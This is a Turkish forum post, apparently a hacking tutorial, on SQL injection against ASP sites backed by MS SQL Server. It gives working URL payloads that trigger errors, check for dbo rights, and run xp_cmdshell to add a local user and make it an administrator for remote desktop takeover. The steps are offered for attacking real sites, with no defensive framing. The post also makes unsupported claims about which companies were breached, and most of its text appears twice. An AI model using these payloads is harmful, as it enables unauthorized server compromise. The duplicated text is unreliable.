Anasayfa
İlk önce şunu bilmemiz gerekmektedir. SQL(Structured Query Language ) sonradan geliştirilen bir
dildir.Geliştirilip ihtiyaç duyulmasının sebebi ise database(veritabani) arasındaki bağlantıyı kolaylaştırmak diyebiliriz.SQL'in en büyük özelliği databasedeki depolanmış verilerin alışverişini yapar.
SQL VE DATABASE ilişkisini çok iyi bilmek gerekir en azından SQL dilini bilmeniz gerekir.ASP sistemlerde artik başlı başına SQL'in kullanıldığını görmekteyiz.PHP'de de bu dilin kullanıldığı göz önüne alındığında doğal olarak güvenlik problemi ile karşılaşılmaktadır.
Bu kadar SQL bilgisinden sonra konumuza dönelim.Öncelikle bizim işimize yarayacak SQL komutlarışunlardır;
UNION = Cümlelerin birlikte kullanılması sağlar.
SELECT= Seçmek
FROM = Tablo yolu
WHERE = Nerede
Diyelim sistemimizde şöyle bir sorgu olsun...
site.com/haber.asp?id=53
id burda değer demektir yani yazdığımız id değeri bize databaseten o veriyi çeker.
Böyle bir sorguda sistem MS SQL kullanıyorsa ve scripteki fonksiyonlarda dengesizlik varsa(hata) saldırgan adreste oynama yaptiginda bunu gorecektir..
site.com/haber.asp?id=238'a
'a --> (hata modülü)
diyelim adreste saldirgan boyle bir oynama yapti.
Bu şu anlama geliyor.
databseten 238'a isimli modülü getir.Tabi sistemde boyle bir şey olmadığından fonksiyonlarda da hata olduğundan sistem bize şu hatayi verecektir.
-------------------------------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string 'a'.
/detail.asp, line 28 (bu kısmı salladım illa böyle olacak diye bir şey yoktur.)
----------------------------------------------------------------
Şimdi bu hatayı aldıktan sonra bu hatayı veren siteyi hatta serveri ele geçirebiliriz demektir!
Gelelim can alıcı noktaya bu site üzerinden servera uzaktan nasıl bağlanacağımıza.Tabi Her Sitede Unclosed hatasının olması O serverin hackleneceği anlamına gelmez ama Unclosed hatası olan sitelerin %90'ı saldırgan tarafından hacklenebilir! Örnek verilcek olursa Microsoft ,Korea ,Sony, Xerox ,Msn ,Yahoo ,Motorola gibi siteler bu açık sayesinde hacklenmiştir.
Şimdi mevcut açığın olduğu sitenin MS SQL yetkilerine bakmamız gerekir. Bizim için önemli olan DBO olup olmamasıdır.
site.com/haber.asp?id=convert(int,(select+user));-- kodundan anlayabiliriz bize zaten aşağıdaki gibi bir hata verecektir.
Kod:
-----------------------------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the nvarchar value 'dbo' to a column of data type int.
/detail.asp,line 53
------------------------------------------------------------
Servere veritabanı için admin ekleme, veritabanını silme, servera admin ekleme gibi bir çok yetki verebilir. Biz burda CMD'yi kullanma yetkisinden yararlanıp uzaktan masaüstü ile servere bağlanacağız.
Local bir bİlgisayarda CMD' den kullanıcı eklerken net user komutunu kullanırız.
Kod:
------------------------------------------------------------
net user manyak 535353 /add (manyak yerine kendi kullanıcı adiniz yazınız
------------------------------------------------------------
Bu kullanıcıya yetki vermek içinde net localgroup komutunu kullanırız.
Kod:
------------------------------------------------------------
net localgroup administrator manyak /add
------------------------------------------------------------
Şimdi biz bu komutları SQL açığı olan site üzerinden Yapacağız.
Kod:
------------------------------------------------------------
http://site.com/haber.asp?id=53;exec%20master..xp_cmdshell 'net user manyak 535353 /add';--
-------------------------------------------------------------
komutu ile site üzerinden exec naster ..xpcmdshell sayesinde sitenin bulunduğu servera kullanıcı ekledim
Şimdi bu eklediğimiz kullanıcıya yetki vericeğiz. Bunuda Site Üzerinden Yapacağız.
Kod:
------------------------------------------------------------
http://site.com/haber.asp?id=53;exec%20master..xp_cmdshell 'net localgroup administrators manyak /add';--
------------------------------------------------------------
komutu ile önceden eklediğimiz manyak userine administrator yetkisi verdim.
Site üzerinden yaptığımız işlemler bu kadar artık sitenin ipsine bakıp uzaktan bağlanmamız kaldı.
Pİng atıp serverin ip adresini hemen örenebilirz. İp sinide öğrendiğimize göre artık servere uzaktan bağlanmak kalıyor.
Saygılarımla
Dipnot: SQL (eskuel), Acces(akses), Syntax(sintaks) şeklinde okunur.
__________________
Server a uzaktan nasıl Uzak masaüstü bağlantısı yapacaksın. Wındowsta zaten bu program mevcut. Donatılarda
dildir.Geliştirilip ihtiyaç duyulmasının sebebi ise database(veritabani) arasındaki bağlantıyı kolaylaştırmak diyebiliriz.SQL'in en büyük özelliği databasedeki depolanmış verilerin alışverişini yapar.
SQL VE DATABASE ilişkisini çok iyi bilmek gerekir en azından SQL dilini bilmeniz gerekir.ASP sistemlerde artik başlı başına SQL'in kullanıldığını görmekteyiz.PHP'de de bu dilin kullanıldığı göz önüne alındığında doğal olarak güvenlik problemi ile karşılaşılmaktadır.
Bu kadar SQL bilgisinden sonra konumuza dönelim.Öncelikle bizim işimize yarayacak SQL komutlarışunlardır;
UNION = Cümlelerin birlikte kullanılması sağlar.
SELECT= Seçmek
FROM = Tablo yolu
WHERE = Nerede
Diyelim sistemimizde şöyle bir sorgu olsun...
site.com/haber.asp?id=53
id burda değer demektir yani yazdığımız id değeri bize databaseten o veriyi çeker.
Böyle bir sorguda sistem MS SQL kullanıyorsa ve scripteki fonksiyonlarda dengesizlik varsa(hata) saldırgan adreste oynama yaptiginda bunu gorecektir..
site.com/haber.asp?id=238'a
'a --> (hata modülü)
diyelim adreste saldirgan boyle bir oynama yapti.
Bu şu anlama geliyor.
databseten 238'a isimli modülü getir.Tabi sistemde boyle bir şey olmadığından fonksiyonlarda da hata olduğundan sistem bize şu hatayi verecektir.
-------------------------------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string 'a'.
/detail.asp, line 28 (bu kısmı salladım illa böyle olacak diye bir şey yoktur.)
----------------------------------------------------------------
Şimdi bu hatayı aldıktan sonra bu hatayı veren siteyi hatta serveri ele geçirebiliriz demektir!
Gelelim can alıcı noktaya bu site üzerinden servera uzaktan nasıl bağlanacağımıza.Tabi Her Sitede Unclosed hatasının olması O serverin hackleneceği anlamına gelmez ama Unclosed hatası olan sitelerin %90'ı saldırgan tarafından hacklenebilir! Örnek verilcek olursa Microsoft ,Korea ,Sony, Xerox ,Msn ,Yahoo ,Motorola gibi siteler bu açık sayesinde hacklenmiştir.
Şimdi mevcut açığın olduğu sitenin MS SQL yetkilerine bakmamız gerekir. Bizim için önemli olan DBO olup olmamasıdır.
site.com/haber.asp?id=convert(int,(select+user));-- kodundan anlayabiliriz bize zaten aşağıdaki gibi bir hata verecektir.
Kod:
-----------------------------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the nvarchar value 'dbo' to a column of data type int.
/detail.asp,line 53
------------------------------------------------------------
Servere veritabanı için admin ekleme, veritabanını silme, servera admin ekleme gibi bir çok yetki verebilir. Biz burda CMD'yi kullanma yetkisinden yararlanıp uzaktan masaüstü ile servere bağlanacağız.
Local bir bİlgisayarda CMD' den kullanıcı eklerken net user komutunu kullanırız.
Kod:
------------------------------------------------------------
net user manyak 535353 /add (manyak yerine kendi kullanıcı adiniz yazınız
------------------------------------------------------------
Bu kullanıcıya yetki vermek içinde net localgroup komutunu kullanırız.
Kod:
------------------------------------------------------------
net localgroup administrator manyak /add
------------------------------------------------------------
Şimdi biz bu komutları SQL açığı olan site üzerinden Yapacağız.
Kod:
------------------------------------------------------------
http://site.com/haber.asp?id=53;exec%20master..xp_cmdshell 'net user manyak 535353 /add';--
-------------------------------------------------------------
komutu ile site üzerinden exec naster ..xpcmdshell sayesinde sitenin bulunduğu servera kullanıcı ekledim
Şimdi bu eklediğimiz kullanıcıya yetki vericeğiz. Bunuda Site Üzerinden Yapacağız.
Kod:
------------------------------------------------------------
http://site.com/haber.asp?id=53;exec%20master..xp_cmdshell 'net localgroup administrators manyak /add';--
------------------------------------------------------------
komutu ile önceden eklediğimiz manyak userine administrator yetkisi verdim.
Site üzerinden yaptığımız işlemler bu kadar artık sitenin ipsine bakıp uzaktan bağlanmamız kaldı.
Pİng atıp serverin ip adresini hemen örenebilirz. İp sinide öğrendiğimize göre artık servere uzaktan bağlanmak kalıyor.
Saygılarımla
Dipnot: SQL (eskuel), Acces(akses), Syntax(sintaks) şeklinde okunur.
__________________
Server a uzaktan nasıl Uzak masaüstü bağlantısı yapacaksın. Wındowsta zaten bu program mevcut. Donatılarda
» en sevdiginiz türk rock grubu
» Satranç Taşlar Birbiri İle Savaşıyor
» SifreLi Cd YazdırMa
» Nero 7 FuLL
» VDownloader
» ’’GÖRÜNENİN ÖTESİNDE’’
» Word Game Deluxe [bulmaca oyunu
» Cally Of Duty 5